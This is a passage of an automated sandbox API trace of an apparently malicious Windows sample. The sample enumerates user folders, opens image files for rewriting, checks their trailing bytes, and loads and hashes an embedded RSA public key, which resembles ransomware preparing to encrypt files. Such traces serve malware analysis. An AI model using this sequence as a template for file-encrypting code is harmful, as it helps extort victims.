(HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.887] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\xogO\\") returned="xogO\\" [0192.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.888] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\") returned="pE 0cUon\\" [0192.888] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0192.888] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.888] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.888] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.888] PathFindFileNameW (pszPath="") returned="" [0192.888] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\xogO\\*" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\xogo\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47aa1ba0, ftCreationTime.dwHighDateTime=0x1d89beb, ftLastAccessTime.dwLowDateTime=0x6a8a7260, ftLastAccessTime.dwHighDateTime=0x1d8a504, ftLastWriteTime.dwLowDateTime=0x6a8a7260, ftLastWriteTime.dwHighDateTime=0x1d8a504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0192.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.890] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47aa1ba0, ftCreationTime.dwHighDateTime=0x1d89beb, ftLastAccessTime.dwLowDateTime=0x6a8a7260, ftLastAccessTime.dwHighDateTime=0x1d8a504, ftLastWriteTime.dwLowDateTime=0x6a8a7260, ftLastWriteTime.dwHighDateTime=0x1d8a504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.890] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47aa1ba0, ftCreationTime.dwHighDateTime=0x1d89beb, ftLastAccessTime.dwLowDateTime=0x6a8a7260, ftLastAccessTime.dwHighDateTime=0x1d8a504, ftLastWriteTime.dwLowDateTime=0x6a8a7260, ftLastWriteTime.dwHighDateTime=0x1d8a504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0192.890] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0192.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.891] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0192.891] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0192.891] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\") returned="7Q5_45ijmfP9bA\\" [0192.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0192.891] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0192.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41cc8 [0192.891] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0192.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.891] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.891] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.892] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.892] PathFindFileNameW (pszPath="") returned="" [0192.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.892] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc02b380, ftCreationTime.dwHighDateTime=0x1d8a1ce, ftLastAccessTime.dwLowDateTime=0x6d1210b0, ftLastAccessTime.dwHighDateTime=0x1d8a64e, ftLastWriteTime.dwLowDateTime=0x6d1210b0, ftLastWriteTime.dwHighDateTime=0x1d8a64e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0192.896] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc02b380, ftCreationTime.dwHighDateTime=0x1d8a1ce, ftLastAccessTime.dwLowDateTime=0x6d1210b0, ftLastAccessTime.dwHighDateTime=0x1d8a64e, ftLastWriteTime.dwLowDateTime=0x6d1210b0, ftLastWriteTime.dwHighDateTime=0x1d8a64e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.896] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67857650, ftCreationTime.dwHighDateTime=0x1d89b6d, ftLastAccessTime.dwLowDateTime=0x187d38f0, ftLastAccessTime.dwHighDateTime=0x1d8a5d0, ftLastWriteTime.dwLowDateTime=0x187d38f0, ftLastWriteTime.dwHighDateTime=0x1d8a5d0, nFileSizeHigh=0x0, nFileSizeLow=0x114e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GwAL3j0fQyIFxx-jKJ.gif", cAlternateFileName="GWAL3J~1.GIF")) returned 1 [0192.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0192.896] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\GwAL3j0fQyIFxx-jKJ.gif") returned=".gif" [0192.896] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\GwAL3j0fQyIFxx-jKJ.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\gwal3j0fqyifxx-jkj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.897] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=70881) returned 1 [0192.897] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.900] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x114bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.900] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.902] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.902] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x114e1, lpOverlapped=0x0) returned 1 [0192.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.903] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0192.904] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.904] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.904] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.904] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.904] GetLastError () returned 0x0 [0192.904] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.904] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0192.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.905] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.905] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.905] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x114e0) returned 0x2d45778 [0192.906] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41cc8 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41d10 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.907] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0192.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39df0 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39dd8 [0192.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0192.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 